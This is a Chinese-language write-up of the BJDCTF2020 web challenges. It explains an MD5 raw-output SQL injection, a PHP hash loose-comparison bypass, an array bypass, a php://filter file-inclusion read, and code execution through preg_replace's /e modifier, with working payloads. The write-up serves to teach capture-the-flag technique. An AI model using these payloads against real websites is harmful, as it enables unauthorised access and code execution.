[原题复现]BJDCTF2020 WEB部分全部解

 简介

 原题复现：https://gitee.com/xiaohua1998/BJDCTF2020_January

 线上平台:https://buuoj.cn（北京联合大学公开的CTF平台） 榆林学院内可使用信安协会内部的CTF训练平台找到此题

1.Easy MD5

 1.涉及知识点：md5函数特性绕过、SQL注入

 md5() 

 md5() 函数计算字符串的 MD5 散列。

 md5() 函数使用 RSA 数据安全，包括 MD5 报文摘要算法。

md5(string,raw)

string	必需。规定要计算的字符串。
raw	可选。规定十六进制或二进制输出格式： TRUE - 原始 16 字符二进制格式 FALSE - 默认。32 字符十六进制数

 

2.通过md5($pass,true)实现SQL注入 

bp抓包  发包发现这一句

Hint: select * from 'admin' where password=md5($pass,true)

 

 可以看到这里的raw参数是True，意为返回原始16字符二进制格式。

 也就是说如果md5值经过hex转成字符串后为 'or'+balabala这样的字符串，则拼接后构成的SQL语句为：

select * from `admin` where password=''or'balabala'

 

 当'or'后面的值为True时，即可构成万能密码实现SQL注入，这里我们需要知道的是MySQL的一个特性：

所以只要'or'后面的字符串为一个非零的数字开头都会返回True，这就是我们的突破点。

 

可以通过这个脚本来获得满足我们要求的明文:

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

//引用于 http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/

 

这里提供一个最常用的：ffifdyop，该字符串md5加密后若raw参数为True时会返回 'or'6 (其实就是一些乱码和不可见字符，这里只要第一位是非零数字即可被判定为True，后面的会在MySQL将其转换成整型比较时丢掉)

所以如果这里我们输入ffifdyop，后端的SQL语句会变成：

select * from `admin` where password=''or'6'           --->  True

 

引用大佬博客:https://www.cnblogs.com/yesec/p/12535534.html

所以输入ffidyop会到下一个页面。

 

3.通过Hash缺陷绕过md5()验证

hash缺陷参考https://www.cnblogs.com/xhds/p/12349189.html

通过查看源代码发现源码

payload:

http://96c67b57-df3d-41a2-bc76-836c71cda19b.node3.buuoj.cn/levels91.php?a=s878926199a&b=QNKCDZO

4.通过数组绕过

到下一个页面直接暴露出源码进行绕过

 payload:

POST：param1[]=1¶m2[]=2

 

CTF数组绕过姿势

>     md5(array()) = null
>     sha1(array()) = null    
>     ereg(pattern,array()) = null vs preg_match(pattern,array) = false
>     strcmp(array(), "abc") = null
>     strpos(array(),"abc") = null

引用：https://blog.csdn.net/q1352483315/java/article/details/89469928

 

 

 

 2.ZJCTF，不过如此

 1.涉及知识点:文件包含、preg_replace()使用的/e模式可以存在远程执行代码

　　　　reg_replace()使用的/e模式可以存在远程执行代码

　　　　https://xz.aliyun.com/t/2557

2.本地文件包含漏洞利用

打开页面出现源码 审计构造..... 

第一个部分可以利用本地文件包含绕过

首先I have a dream base64编码 SSBoYXZlIGEgZHJlYW0= 使用PHP伪协议来绕过 file_get_contents==="I have a dream"  页面有个注释内容为next.PHP

最后构造payload:

?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php

获得next.php文件的源码

 

php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

 3.利用.reg_replace()使用的/e模式远程执行代码getflag

payload:

/next.php?\S*=${getflag()}&cmd=show_source(%22/flag%22);

 简介

1

 简介

1

 简介

1